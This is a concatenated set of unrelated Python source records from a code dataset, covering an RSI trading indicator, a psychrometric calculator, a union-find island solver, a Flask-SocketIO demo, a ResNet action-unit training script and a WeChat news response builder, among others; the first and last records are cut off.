normalized\r\n\r\n# Write output file (2 bytes/pixel)\r\ndef write_outfile(pixels, numarray, autoencoder, imageset, outputname, parameters):\r\n if pixels is None:\r\n pixels, numarray = numpy_from_dataset(imageset, 4, False)\r\n newpixels = np.reshape(pixels, (-1, numarray[2], numarray[3]))\r\n embedding = list((K.function([autoencoder.input], [layer.output])(newpixels) for layer in autoencoder.layers if layer.output_shape == (None, parameters[5])))\r\n newlst = normalization(embedding)\r\n write_output(newlst, len(embedding[0][0]), outputname)\r\n","sub_path":"Reduce-Dimensions-Bottleneck-Autoencoder/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":11993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"341603111","text":"'''\nRSI indicator\n'''\nimport numpy as np\nfrom collections import OrderedDict\nimport chart_pattern as pattern\nimport trade_support as tsup\n\nMIN_NUM_BAR = 1\nRSI_LEN = 14\n\n\ndef setup_param(param):\n if 'nbar' in param:\n global MIN_NUM_BAR\n MIN_NUM_BAR = int(param['nbar'])\n\n if 'rsi_len' in param:\n global RSI_LEN\n RSI_LEN = int(param['rsi_len'])\n\n\ndef run_indicator(symbol, ohlc, param={}):\n ind_dct = OrderedDict()\n __algo_func(ohlc, ind_dct)\n __algo_strategy(ohlc, ind_dct)\n return ind_dct\n\n\ndef __algo_func(ohlc, ind_dct):\n prices = ohlc['Adj Close']\n deltas = np.diff(prices)\n seed = deltas[:RSI_LEN + 1]\n up = seed[seed >= 0].sum() / RSI_LEN\n down = -seed[seed < 0].sum() / RSI_LEN\n rs = up / down\n\n rsi = np.zeros_like(prices)\n rsi[:RSI_LEN] = 100. - 100. / (1. + rs)\n\n for i in range(RSI_LEN, len(prices)):\n delta = deltas[i - 1] # cause the diff is 1 shorter\n\n if delta > 0:\n up_val = delta\n down_val = 0.\n else:\n up_val = 0.\n down_val = -delta\n\n up = (up * (RSI_LEN - 1) + up_val) / RSI_LEN\n down = (down * (RSI_LEN - 1) + down_val) / RSI_LEN\n\n rs = up / down\n rsi[i] = 100. - 100. / (1. + rs)\n # get the last one\n ind_dct['rsi'] = round(rsi[-1], 3)\n ohlc['rsi'] = rsi\n\n return ind_dct\n\n\ndef __algo_strategy(ohlc, ind_dct):\n '''\n offset = self.cl\n over_sold = 30\n over_bought = 70\n prev = self.rsi[-offset]\n for idx, rs in enumerate(self.rsi[-offset:]):\n if (prev < over_sold) and (rs > over_sold):\n self.ind['rsi_b'] = \"True(%d)\" % (offset-idx)\n if (prev > over_bought) and (rs < over_bought):\n self.ind['rsi_s'] = \"True(%d)\" % (offset-idx)\n prev = rs\n return\n '''\n buy_sig, sell_sig = pattern.cross_value(ohlc['rsi'], ohlc['rsi'], 30, 70, MIN_NUM_BAR)\n tsup.get_last_signal(buy_sig, sell_sig, ind_dct, 'rsi_b', 'rsi_s')\n ohlc['rsi_b'] = buy_sig\n ohlc['rsi_s'] = sell_sig\n","sub_path":"core/algo_rsi.py","file_name":"algo_rsi.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"351140537","text":"#Title :-Calculate symmetric difference between 2 sets\n#Author :-Vighnesh Gawad\n#Created:-15 october 2018\na=input()\nb= set(list(map(int, input().split())))\nc=input()\nd=set(list(map(int, input().split())))\nmyset=b.difference(d)\nmyset.update(d.difference(b))\nl=sorted(list(myset))\nfor i in (l):\n print(i)\n","sub_path":"Sets/SymmetricDifference.py","file_name":"SymmetricDifference.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586888459","text":"import psychrolib\n\npsychrolib.SetUnitSystem(psychrolib.SI)\n\nprint(\"\")\n\ninval = input (\"Please enter the dry-bulb temperature: \")\ninv = float(inval)\n\nprint(\"\")\n\ninval2 = input (\"Please enter the pressure: \")\ninv2 = float(inval2)\n\nprint(\"\")\n\ninval3 = input (\"Please enter the humidity ratio: \")\ninv3 = float(inval3)\n\nprint(\"\")\n\ninval5 = input (\"Please enter the kg of dry air and water vapor: \")\ntotmass = float(inval5)\n\nenth = psychrolib.GetMoistAirEnthalpy(inv, inv3)\nens = str(enth)\n\nvol = psychrolib.GetDryAirVolume(inv, inv2)\nens2 = str(vol)\n\nmvol = psychrolib.GetMoistAirVolume(inv, inv3, inv2)\nens3 = str(mvol)\n\ntotvol = float(vol + mvol)\nspvol = totvol/totmass\n\nspecvol = str(spvol)\n\nprint(\"\")\n\nprint (\"The mpist-air enthalpy is: \" + ens)\n\nprint(\"\")\n\nprint (\"The dry-air volume is: \" + ens2)\n\nprint(\"\")\n\nprint (\"The moist-air volume is: \" + ens3)\n\nprint(\"\")\n\nprint (\"The specific volume is: \" + specvol)\n\n\n#Specific volume is defined as the total volume of dry air and water vapor mixture per kg of dry air and water vapor (SI-units). The specific volume can be expressed as: v = V / ma + mw (11)\n\n","sub_path":"enth.py","file_name":"enth.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"312765314","text":"# union find\nclass Solution(object):\n def largestIsland(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n if not grid or not grid[0]:\n return 0\n m, n = len(grid), len(grid[0])\n parent = {(i, j): (i, j) for i in range(m) for j in range(n) if grid[i][j] == 1}\n size = {(i, j): 1 for i in range(m) for j in range(n) if grid[i][j] == 1}\n \n def find(u):\n if parent[u] != u:\n parent[u] = find(parent[u])\n return parent[u]\n \n def union(u, v):\n p, q = find(u), find(v)\n if p != q:\n if size[p] < size[q]:\n p, q = q, p\n parent[q] = p\n size[p] += size[q]\n return True\n return False\n \n for i in range(m):\n for j in range(n):\n if grid[i][j] == 0:\n continue\n for dx, dy in [(-1, 0), (0, -1)]:\n p, q = i + dx, j + dy\n if 0 <= p < m and 0 <= q < n and grid[p][q] == 1:\n union((i, j), (p, q))\n map(find, parent)\n \n # check the islands near current grid[i][j]==0\n res = 1\n# res = max(size.values()) # size might be empty and max will throw an error\n for i in range(m):\n for j in range(n):\n if grid[i][j] == 1: \n res = max(res, size[find((i,j))])\n else:\n roots = set()\n for dx, dy in [(1, 0), (-1, 0), (0, 1), (0, -1)]:\n p, q = i + dx, j + dy\n if 0 <= p < m and 0 <= q < n and grid[p][q] == 1:\n roots.add(find((p, q)))\n # cur means the size of the max island if we change (i, j) from 0 to 1\n cur = 1\n for root in roots:\n cur += size[root]\n res = max(res, cur)\n \n return res\n\n\n\n\n\"\"\"\nIn a 2D grid of 0s and 1s, we change at most one 0 to a 1.\n\nAfter, what is the size of the largest island? \n(An island is a 4-directionally connected group of 1s).\n\nExample 1:\n\nInput: [[1, 0], [0, 1]]\nOutput: 3\nExplanation: Change one 0 to 1 and connect two 1s, then we get an island with area = 3.\nExample 2:\n\nInput: [[1, 1], [1, 0]]\nOutput: 4\nExplanation: Change the 0 to 1 and make the island bigger, only one island with area = 4.\nExample 3:\n\nInput: [[1, 1], [1, 1]]\nOutput: 4\nExplanation: Can't change any 0 to 1, only one island with area = 4.\n \n\nNotes:\n\n1 <= grid.length = grid[0].length <= 50.\n0 <= grid[i][j] <= 1.\n\"\"\"\n","sub_path":"0827. Making A Large Island.py","file_name":"0827. Making A Large Island.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"618958837","text":"import math\n\nfrom ..maths import Vector2D\nfrom .core import ConfigurationError\n\ndef getDirectionOrAngle(config, direction_name='direction', angle_name='angle', return_none=False):\n\tdirection = config.get(direction_name)\n\tangle = config.get(angle_name)\n\n\tif return_none and direction == angle == None:\n\t\treturn None\n\n\tif (direction is None) == (angle is None):\n\t\traise ConfigurationError(\n\t\t\t\"Either only ``direction`` or ``angle`` must be defined.\")\n\n\tif direction is None:\n\t\tdirection = Vector2D.fromAngle(angle, radians=config.get(\"radians\", True))\n\telse:\n\t\tdirection = Vector2D(*direction).normalize()\n\treturn direction\n","sub_path":"dml/components/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"36414753","text":"\"\"\"\nDemo Flask application to test the operation of Flask with socket.io\nAim is to create a webpage that is constantly updated with random numbers from a background python process.\n30th May 2014\n\"\"\"\n\n# Start with a basic flask app webpage.\nfrom flask_socketio import SocketIO\nfrom flask import Flask, render_template, url_for, copy_current_request_context\nfrom random import random\nfrom time import sleep\nfrom threading import Thread, Event\n\n\n__author__ = 'slynn'\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\napp.config['DEBUG'] = True\n\n#turn the flask app into a socketio app\nsocketio = SocketIO(app)\n\n#random number Generator Thread\nthread = Thread()\nthread_stop_event = Event()\n\nclass RandomThread(Thread):\n def __init__(self):\n self.delay = 1\n super(RandomThread, self).__init__()\n\n def randomNumberGenerator(self):\n \"\"\"\n Generate a random number every 1 second and emit to a socketio instance (broadcast)\n Ideally to be run in a separate thread?\n \"\"\"\n #infinite loop of magical random numbers\n print(\"Making random numbers\")\n while not thread_stop_event.isSet():\n number = round(random()*10, 3)\n print(number)\n socketio.emit('message', number)\n sleep(self.delay)\n\n def run(self):\n self.randomNumberGenerator()\n\n\n@socketio.on('connect')\ndef test_connect():\n # need visibility of the global thread object\n global thread\n print('Client connected')\n\n #Start the random number generator thread only if the thread has not been started before.\n if not thread.is_alive():\n print(\"Starting Thread\")\n thread = RandomThread()\n thread.start()\n\n@socketio.on('disconnect')\ndef test_disconnect():\n print('Client disconnected')\n\n\nif __name__ == '__main__':\n socketio.run(app, host='localhost', port=2999)","sub_path":"pextant/webapp/flaskdemo.py","file_name":"flaskdemo.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"479080365","text":"def dfs_non_recursive(graph, source): # Provide a graph and a starting point\n if source is None or source not in graph:\n return \"Invalid input\"\n path = []\n stack = [source]\n while(len(stack) != 0):\n s = stack.pop()\n if s not in path:\n path.append(s)\n if s not in graph:\n continue\n for neighbor in graph[s]:\n stack.append(neighbor)\n return \" \".join(path)\n","sub_path":"PYTHON/DFS-Non_Recursive.py","file_name":"DFS-Non_Recursive.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"319959669","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 6 14:01:33 2019\n\n@author: scott\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom EC_MS import download_cinfdata_set, plot_signal, plot_signal_vs_temperature, compare_signal_to_temperature\nfrom EC_MS import load_calibration_results\nfrom EC_MS import plot_flux\n\nplt.close('all')\n\n\ndata = download_cinfdata_set(setup='microreactorNG', time='2019-06-25 09:52:30')\n\n#plot_signal(data, leg=True, meta_data=['TC temperature'], rh_label='Temperature [C]')\n#plot_signal_vs_temperature(data, leg=True, reciprocal=True)\ncompare_signal_to_temperature(MS_data=data)\nplt.show()\nexit()\n\nmdict = load_calibration_results('19F04_calibration.pkl')\n\n\n\nO2, CO2, CO, Ar = mdict['O2'], mdict['CO2'], mdict['CO'], mdict['Ar']\n\nif True: # take background from CO2 cracking into account when calculating CO flux\n # NOTE below on why cal_mat is used exactly this way.\n CO.cal_mat = {'M28':1/CO.F_cal}\n CO.cal_mat['M44'] = - CO.cal_mat['M28'] * CO2.spectrum['M28']/CO2.spectrum['M44']\n\n\n\n#plot_flux(data, mols=[O2, CO2, CO, Ar], unit='pmol/s')\n\nCO2.get_bg(data, tspan=[0, 100])\n\ntspan = [11000, 14000]\nx, y = CO2.get_flux(data, tspan=tspan, background='preset',\n unit='pmol/s')\n\nfig, ax = plt.subplots()\nax.plot(x, y, color=CO2.get_color())\nprint(y.shape)\ny_bg = CO2.background*1e12 * np.ones(y.shape)\n\nax.plot(x, y_bg, color=CO2.get_color(), linestyle='--')\n\nax.set_yscale('log')\n\nax.set_ylabel('cal. CO2 signal / [pmol/s]')\nax.set_xlabel('time / s')\n\n\nprint('CO2 flux during tspan=' + str(tspan) + ' is ' + str(np.mean(y)) + ' pmol/s')\n#plt.show()\n\n\n# Trying something else now !!!!\n\n\nfrom EC_MS import Chip\n\nchip = Chip('MR12')\nprint('\\nAir flux through the chip in pmol/s: ' + str(chip.capillary_flow(gas='air') / 6.02e23 * 1e12))\n\n\nprint('flux of 1 bar CO2 through chip at 100 C in pmol/s: ' + str(chip.capillary_flow(gas='CO2', T=398.15) / 6.02e23 * 1e12))\n\n\n\n\n\n\nx_CO2, y_CO2 = CO2.get_flux(data, tspan=[2000, 75000])\nx_CO, y_CO = CO.get_flux(data, tspan=[2000, 75000])\nx_Ar, y_Ar = Ar.get_flux(data, tspan=[2000, 75000])\nx_O2, y_O2 = O2.get_flux(data, tspan=[2000, 75000])\n\nl = min(len(y_CO2), len(y_CO), len(y_O2), len(y_Ar))\n\n\np_CO2 = y_CO2[0:l] / (y_CO2[0:l] + y_CO[0:l] + y_Ar[0:l] + y_O2[0:l]) # CO2 partial pressure in chip in bar\np_CO = y_CO[0:l] / (y_CO2[0:l] + y_CO[0:l] + y_Ar[0:l] + y_O2[0:l]) # CO2 partial pressure in chip in bar\np_Ar = y_Ar[0:l] / (y_CO2[0:l] + y_CO[0:l] + y_Ar[0:l] + y_O2[0:l]) # CO2 partial pressure in chip in bar\np_O2 = y_O2[0:l] / (y_CO2[0:l] + y_CO[0:l] + y_Ar[0:l] + y_O2[0:l]) # CO2 partial pressure in chip in bar\n\nprint(l)\nt1 = 2500#end time of first cycle\nt2 = 5000#end time of second cylle\nt3 = 7500#end time of third cycle\n\n\nfig, ax = plt.subplots()\nax.plot(x_CO2[0:l], p_CO2, color=CO2.get_color(), label='CO2')\nax.plot(x_CO2[0:l], p_CO, color=CO.get_color(), label='CO')\nax.plot(x_CO2[0:l], p_O2, color=O2.get_color(), label='O2')\nax.plot(x_CO2[0:l], p_Ar, color=Ar.get_color(), label='Ar')\n\nax.plot(x_CO2[0:t1], 0.5*np.ones(x_CO2[0:t1].shape), color='blue', linestyle='--')\nax.plot(x_CO2[t1:t2], 1/2.5*np.ones(x_CO2[t1:t2].shape),color='green', linestyle='--') \nax.plot(x_CO2[t2:t3], 1/3.5*np.ones(x_CO2[t2:t3].shape), color='red', linestyle='--') \n\nplt.show()\n\n\n\n'''\n ------- NOTE: use of m.cal_mat --------\nWhen a Molecule object has the attribute cal_mat, it is used instead of the\nmore simple F_cal to calculate the molecule's flux from a given set of m/z signals.\n\nEach m/z signal (at mass, e.g. 'M29') in the desired timespan is multiplied by cal_mat[M], and then\nthese are added up to give the flux. In the most simple case, cal_mat has only one\nitem, at the primary mass, which is just the reciprocal of F_cal (since F_cal is an absolute\nsensitivity factor, you divide by it to go from signal to flux), i.e.:\nmolecule.cal_mat = {molecule.primary: 1/molecule.F_cal}\n\nIf we have an interference at the molecule's primary mass due to e.g., propane,\nwe can correct for this using cal_mat. We put a negative value for the primary mass\nof the interfering molecule, i.e. 'M29' for propane, so that so that a factor times\nthe M29 signal is subtracted when calculating the flux. What should this factor be?\nAs an example, use propene, with primary='M41'. The signal at M41 is:\n\nS_M41 = j_C3H6 * F_M41_C3H6 + j_C3H8 * F_M41_C3H8\nS_M41 = j_C3H6 * F_M41_C3H6 + (S_M29/F_M29_C3H8) * F_M41_C3H8\nisolating j_C3H6:\nj_C3H6 = 1/F_M41_C3H6 * (S_M41 - F_M41_C3H8/F_M29_C3H8 * S_M29)\nj_C3H6 = 1/F_M41_C3H6 * S_M41 + (-1/F_M41_C3H6 * F_M41_C3H8/F_M29_C3H8) * S_M29\n\nso the factor to multiply S_M29 by, cal_mat['M29'] is\n-1/F_M41_C3H6 * F_M41_C3H8/F_M29_C3H8 = -ratio/F_M41_C3H6\n\nwhere ratio can be obtained from the propane spectrum:\nratio = C3H8.spectrum['M41']/C3H8.spectrum['M29']\n\nThis is implemented below.\n\n'''\n\n","sub_path":"calibration/Krabbe_using_gas_calibration2.py","file_name":"Krabbe_using_gas_calibration2.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"242060207","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'Xin Dou'\n__email__ = \"master2dou@gmail.com\"\n\nimport xml.etree.ElementTree as ET\n\nfrom wechat.responser.response import Response\n\n\nclass NewsResponse(Response):\n def __init__(self, from_user_name, to_user_name, article_list):\n Response.__init__(self, from_user_name, to_user_name)\n self.article_list = article_list\n\n msg_type_element = ET.SubElement(self.root_element, \"MsgType\")\n msg_type_element.text = self.create_cdata(\"news\")\n self._parser_articles()\n\n def _parser_articles(self):\n article_count_element = ET.SubElement(self.root_element, \"ArticleCount\")\n article_count_element.text = self.create_cdata(len(self.article_list))\n\n articles_element = ET.SubElement(self.root_element, \"Articles\")\n\n for item in self.article_list:\n item_element = ET.SubElement(articles_element, \"item\")\n title_element = ET.SubElement(item_element, \"Title\")\n title_element.text = self.create_cdata(item.title)\n\n description_element = ET.SubElement(item_element, \"Description\")\n description_element.text = self.create_cdata(item.description)\n\n pic_url_element = ET.SubElement(item_element, \"PicUrl\")\n pic_url_element.text = self.create_cdata(item.pic_url)\n\n url_element = ET.SubElement(item_element, \"Url\")\n url_element.text = self.create_cdata(item.url)","sub_path":"responser/newsresponse.py","file_name":"newsresponse.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"325292516","text":"import glob\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torchvision.models as models\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport h5py\nfrom PIL import Image\nfrom sklearn.externals import joblib\nimport shutil\nimport os\nimport random\nimport pickle\nimport time\nimport gc\nimport re\nfrom tensorboardX import SummaryWriter\nimport time\nimport math\nimport sys\nfrom torchvision import datasets, models, transforms\nimport csv\nimport pandas as pd\n\npreprocess = transforms.Compose([\n\ttransforms.ToTensor(),\n\ttransforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n'----------------------------------------------------Resnet------------------------------------------------------------'\nclass resnetAU(nn.Module):\n\tdef __init__(self,resnet_pre):\n\t\tsuper(resnetAU, self).__init__()\n\t\t#defining layers in convnet\n\t\tself.resnet=resnet_pre\n\t\tself.fcau = nn.Linear(512,17)\n\n\tdef forward(self, x):\n\t\tx = self.resnet(x)\n\t\tx = x.squeeze(2)\n\t\tx = x.squeeze(2)\n\t\tx = self.fcau(x)\n\t\treturn x\n\nresnet18_filename = 'resnet_only_BEST.pth.tar'\nresnet_pre = models.resnet18(pretrained=True) # Define resnet18 model\nnum_ftrs = resnet_pre.fc.in_features\nresnet_pre.fc = nn.Linear(num_ftrs, 6).cuda()\nstate = torch.load(resnet18_filename)\nresnet_pre.load_state_dict(state['model'])\nmodules = list(resnet_pre.children())[:-1] # delete the last fc layer and the avg.pool layer\nresnet_pre = nn.Sequential(*modules)\nresnet = resnetAU(resnet_pre)\n# print(resnet)\n\n'------------------------------------------------------Hyperparameters-------------------------------------------------'\nbatch_size = 8\nno_of_AUs = 17\nuse_CUDA = True\nuse_pretrained = False\ntest_mode = False\nval_mode = False\ntrain_mode = True\nno_of_epochs = 1000\nwriter = SummaryWriter('./logs_CREMAD_AU')\nread_prev_list = False and not test_mode\n'----------------------------------------------------------------------------------------------------------------------'\ncurr_epoch = 0\ntotal = 0\n'----------------------------------------------------------------------------------------------------------------------'\nresnet = resnet.cuda()\n'----------------------------------------------------------------------------------------------------------------------'\ncriterion = nn.MSELoss()\nparams = list(resnet.parameters())\nprint('Parameters in the model = ' + str(len(params)))\noptimizer = torch.optim.Adam(params, 0.000001)\n\n'------------------------------------------Saving Intermediate Models--------------------------------------------------'\n\n\ndef save_checkpoint(state, is_final, filename='AU_net'):\n\tfilename = filename +'_'+str(state['epoch'])+'.pth.tar' \n\ttorch.save(state, './AUNet/'+filename)\n\tif is_final:\n\t\tshutil.copyfile(filename, 'model_final.pth.tar')\n\n\n'-------------------------------------------Setting into train mode----------------------------------------------------'\n\nif not train_mode:\n\tresnet.train(False)\nelse:\n\tresnet.train(True)\n'----------------------------------------------------------------------------------------------------------------------'\nif train_mode:\n\tvocal_directory = \"./WAVFiles/train\"\n\tvisual_directory = \"../train_30\"\nelif val_mode:\n\tvocal_directory = \"./WAVFiles/val\"\n\tvisual_directory = \"../val_30\"\nelse:\n\tvocal_directory = \"./WAVFiles/test\"\n\tvisual_directory = \"../test_30\"\n'----------------------------------------------------------------------------------------------------------------------'\nnames = {}\nstart_time = time.time()\nemotions = ['A','D','F','H','N','S']\nall_frames = []\nfor emotion in emotions:\n\tfor idx,filename in enumerate(sorted(glob.iglob(visual_directory+'/'+emotion+'/'+'*.jpg'))):\n\t\tall_frames.append(filename)\n\t\tstart_len = len(visual_directory+'/'+emotion+'/')\n\t\t# if(filename[-6].isdigit()):\n\t\t# \tstart_len = len(visual_directory+'/'+emotion+'/')\n\t\t# \tstring = filename[:start_len+15]\n\t\t# \tnames[string] = max(1,int(filename[-6:-4]))\n\t\t\t# if(names[string]<45):\n\t\t\t# \tdel(names[string])\ntime_elapsed = time.time() - start_time\nprint(len(names))\nprint(time_elapsed)\n\nprev_loss = 0\n\nsequences = []\n\nemo_dict = {\"ANG\":0, \"DIS\":1 ,\"FEA\" :2 ,\"HAP\" :3, \"NEU\" : 4, \"SAD\":5}\n\nif not train_mode:\n\tno_of_epochs = 1\n\tbatch_size = 1\nall_frames = np.random.permutation(np.array(all_frames))\nfor epoch in range(curr_epoch,no_of_epochs):\n\tj_start = 0\n\trunning_loss = 0\n\trunning_corrects = 0\n\tif use_pretrained:\n\t\tpretrained_file = 'attention_net__2.pth.tar'\n\n\t\tcheckpoint = torch.load(pretrained_file)\n\t\tresnet.load_state_dict(checkpoint['resnet'])\n\t\tif train_mode:\n\t\t\tepoch = checkpoint['epoch']+1\n\t\t\tuse_pretrained = False\n\t\t\toptimizer.load_state_dict(checkpoint['optimizer'])\n\n\tK = 0\n\n\tfor j in range(j_start,len(all_frames),batch_size):\n\n\t\tbatch_frames = all_frames[j : j + batch_size]\n\t\ttarget_numpy = np.empty((batch_size,no_of_AUs), dtype = np.float32)\n\n\t\tfor idx,name in enumerate(batch_frames):\n\t\t\timg = Image.open(name)\n\t\t\tpixels = preprocess(img)\n\t\t\tpixels = pixels.unsqueeze(0)\n\t\t\tinput = Variable(pixels).cuda()\n\t\t\tif idx == 0:\n\t\t\t\timage_batch = input\n\t\t\telse:\n\t\t\t\timage_batch = torch.cat((image_batch, input), 0)\n\t\t\tcsv_file = name[start_len:start_len+15]+'.csv'\n\t\t\tif(name[-6].isdigit()):\n\t\t\t\tframe_no = int(name[-6:-4])\n\t\t\telse:\n\t\t\t\tframe_no = int(name[-5:-4])\n\t\t\t# print(name, csv_file, frame_no)\n\n\t\t\tcsv_file_name = './processed/'+csv_file\n\t\t\tdf = pd.read_csv(csv_file_name)\n\t\t\t# print(df)\n\t\t\tdf = df.iloc[[frame_no-1],[5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]]\n\t\t\t# print(df.values[0])\n\t\t\ttarget_numpy[idx] = df.values[0]\n\n\t\t\t# with open('./processed/'+csv_file, 'r') as csvfile:\n\t\t\t# \tcsvr = csv.reader(csvfile,quoting=csv.QUOTE_NONNUMERIC)\n\t\t\t# \tcsvr = list(csvr)\n\t\t\t# \tif len(csvr) <= frame_no:\n\t\t\t# \t\trow_no = len(csvr) - 1\n\t\t\t# \telse:\n\t\t\t# \t\trow_no = frame_no\n\n\t\t\t# \tprint(csvr[frame_no][5:22])\n\t\t\t# \ttarget_numpy[idx] = csvr[frame_no][5:22] # The 3rd row\n\t\t\t# \tprint(target_numpy)\n\n\n\t\t\t# for batch in range(batch_size):\n\t\t\t# \tif(emo_dict[name[-6:-3]] == emo_dict[vocal_mat_file[-10:-7]]):\n\t\t\t# \t\ttarget_numpy[batch] = emo_dict[vocal_mat_file[-10:-7]]\n\t\t\t# \telse:\n\t\t\t# \t\tprint(name)\n\t\t\t# \t\tsys.exit(\"Emotions don't match :( \")\n\n\t\t\t# start_frame = 0\n\t\t\t# end_frame = mid_frame + 22\n\t\t\t# # print(start_frame)\n\t\t\t# # print(end_frame)\n\t\t\t# for frame in range(start_frame,end_frame+1):\n\t\t\t# \tvisual_file = name + '_frame_' + str(frame)+'.jpg'\n\t\t\t# \timg = Image.open(visual_file)\n\t\t\t# \tpixels = preprocess(img)\n\t\t\t# \tpixels = pixels.unsqueeze(0)\n\t\t\t# \tinput = Variable(pixels).cuda()\n\t\t\t# \tif frame == start_frame:\n\t\t\t# \t\timage_batch = input\n\t\t\t# \telse:\n\t\t\t# \t\timage_batch = torch.cat((image_batch, input), 0)\n\t\tresnet_output = resnet(image_batch)\n\t\t# print(target_numpy)\n\n\t\t# print(resnet_output.size())\n\t\ttarget = Variable(torch.from_numpy(target_numpy)).cuda() \n\n\t\t# print(vocal_output.size())\n\t\t# print(vocal_mat_file)\n\t\t# print(name + '_frame_' + str(start_frame)+'.jpg')\n\n\t\tloss = criterion(resnet_output, target)\n\n\t\toptimizer.zero_grad()\n\t\tresnet.zero_grad()\n\n\t\tif train_mode:\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\n\t\trunning_loss += loss.data[0]\n\t\tK+=1\n\t\taverage_loss = float(running_loss)/float(K)\n\n\t\tprint('Training -- Epoch [%d], Sample [%d], Average Loss: %.4f'\n\t\t% (epoch+1, j+batch_size, average_loss))\n\t\tif (j+batch_size)%10000==0:\n\t\t\tsave_checkpoint({\n\t\t\t\t'epoch': epoch,\n\t\t\t\t'loss' : running_loss,\n\t\t\t\t'j_start' : 0,\n\t\t\t\t'resnet' : resnet.state_dict(),\n\t\t\t\t'optimizer': optimizer.state_dict(),\n\t\t\t}, False,'AU_net_iter_'+str(j+batch_size))\t\t\t\n\t'-------------------------------------------------Saving model after every epoch-----------------------------------'\n\tif train_mode:\n\t\tsave_checkpoint({\n\t\t\t'epoch': epoch,\n\t\t\t'loss' : running_loss,\n\t\t\t'j_start' : 0,\n\t\t\t'resnet' : resnet.state_dict(),\n\t\t\t'optimizer': optimizer.state_dict(),\n\t\t}, False,'AU_net_iter_')\n'------------------------------------------------------Saving model after training completion--------------------------'\nif train_mode:\n\tsave_checkpoint({\n\t\t'epoch': epoch,\n\t\t'accuracy': running_accuracy,\n\t\t'loss' : running_loss,\n\t\t'correct' : running_corrects,\n\t\t'j_start' : 0,\n\t\t'resnet' : resnet.state_dict(),\n\t\t'optimizer': optimizer.state_dict(),\n\t}, False)","sub_path":"Paper/resnet_AUtraining.py","file_name":"resnet_AUtraining.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"497143985","text":"\"\"\"\n\nVariables, as distinct from constants, change with the local environment. Defaults, if any, are established here if no\nvalue exists in the local environment.\n\n.. versionadded:: 0.34.0-d\n\n``PROJECT_ARCHIVE``\n-------------------\n\nDefault: ``$PROJECT_HOME/.archive``\n\nWhere projects are archived. Additional scripts may be written to further process projects in this directory.\n\n``PROJECT_HOME``\n----------------\n\nDefault: ``~/Work``\n\nWhere active projects are stored.\n\n``PROJECTS_ON_HOLD``\n--------------------\n\nDefault: ``$PROJECT_HOME/.hold``\n\nWhere inactive projects are stored.\n\n``PROJECT_TEMPLATE_PATH``\n-------------------------\n\nDefault: ``$PYTHON_HOME/bogeymin/templates``\n\n.. versionchanged:: 0.34.1-d\n These variables were migrated from ``constants``.\n\nThe path to project template files. Used by the ``project init`` command. This forms the basis for various other\ntemplate variables:\n\n- ``GITIGNORE_TEMPLATE``: The template used for creating a project's ``.gitignore`` file.\n- ``MANIFEST_TEMPLATE``: The template used for creating a project's ``MANIFEST.in`` file.\n- ``PROJECT_INI_TEMPLATE``: The template used for creating a project's ``project.ini`` file.\n- ``README_TEMPLATE``: The template used for creating a project's ``README.markdown`` file.\n- ``REQUIREMENTS_TEMPLATE``: The template used for creating a project's ``requirements.pip`` file. The default file is\n blank, but you may override the template to incorporate your own processing.\n\n\"\"\"\n# Imports\n\nimport os\n\n# NOTE: Since these are specific to each user, you *must* document the variables above. Otherwise the defaults will\n# appear in the documentation.\n__all__ = (\n \"GITIGNORE_TEMPLATE\",\n \"MANIFEST_TEMPLATE\",\n \"PROJECT_ARCHIVE\",\n \"PROJECT_HOME\",\n \"PROJECT_INI_TEMPLATE\",\n \"PROJECT_TEMPLATE_PATH\",\n \"PROJECTS_ON_HOLD\",\n \"README_TEMPLATE\",\n \"REQUIREMENTS_TEMPLATE\",\n)\n\n# Location of projects. User home is automatically expanded.\nPROJECT_HOME = os.environ.get(\"PROJECT_HOME\", os.path.expanduser(\"~/Work\"))\n\n# Location of archived projects.\nPROJECT_ARCHIVE = os.environ.get(\"PROJECT_ARCHIVE\", os.path.join(PROJECT_HOME, \".archive\"))\n\n# Location of projects on hold.\nPROJECTS_ON_HOLD = os.environ.get(\"PROJECTS_ON_HOLD\", os.path.join(PROJECT_HOME, \".hold\"))\n\n# Templates. Especially for project init.\nPROJECT_TEMPLATE_PATH = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"templates\")\n\nGITIGNORE_TEMPLATE = 